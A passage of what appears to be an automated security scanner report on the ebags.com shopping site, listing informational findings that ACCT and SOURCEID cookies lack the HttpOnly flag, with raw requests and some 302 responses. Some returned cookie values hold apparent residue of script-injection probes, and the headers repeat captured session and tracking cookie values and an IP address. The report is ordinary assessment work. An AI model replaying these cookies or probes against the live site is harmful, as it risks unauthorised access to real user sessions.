Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_cc=true; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbDomTm=0; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; __cmbTpvTm=1807; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":1,"to":3,"c":"http://www.ebags.com/product/case-logic/sony-psp-game-case/120830","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520120830%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fdepartment%25252Fbags-by-ebags%2526ot%253DA

Response

3.35. http://www.ebags.com/department/business-and-laptop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/business-and-laptop

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/business-and-laptop HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.36. http://www.ebags.com/department/designer-handbags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/designer-handbags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/designer-handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.37. http://www.ebags.com/department/handbags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/handbags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.38. http://www.ebags.com/department/kids-and-baby previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/kids-and-baby

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/kids-and-baby HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.39. http://www.ebags.com/department/luggage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/luggage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/luggage HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.40. http://www.ebags.com/department/messenger-bags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/messenger-bags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/messenger-bags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.41. http://www.ebags.com/department/sale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sale

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.42. http://www.ebags.com/department/snow-and-skate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/snow-and-skate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/snow-and-skate HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.43. http://www.ebags.com/department/sports-and-duffels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/sports-and-duffels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/sports-and-duffels HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.44. http://www.ebags.com/department/travel-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/travel-accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/travel-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.45. http://www.ebags.com/department/wallets-and-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/wallets-and-accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/wallets-and-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.46. http://www.ebags.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D7C4E0%5C710F0A6ABDF; expires=Sun, 02-Jan-2011 14:04:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.47. http://www.ebags.com/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.48. http://www.ebags.com/info/Compare/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/Compare/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/Compare/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:17:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1540

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.49. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:18:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1502

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.50. http://www.ebags.com/info/ratings/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/ratings/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/ratings/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:17:43 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: https://www.ebags.com/members/index.cfm?Fuseaction=my_ebags_login&destination=ratings&RequireCookie=yes&myebags=yes
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:43 GMT; path=/
Set-Cookie: CUSTOMERID=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1641

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.ebags.com/members/index.cfm?Fuseaction=my_ebags_login&destination=ratings&RequireCookie=yes&m
...[SNIP]...

3.51. http://www.ebags.com/members/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/members/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
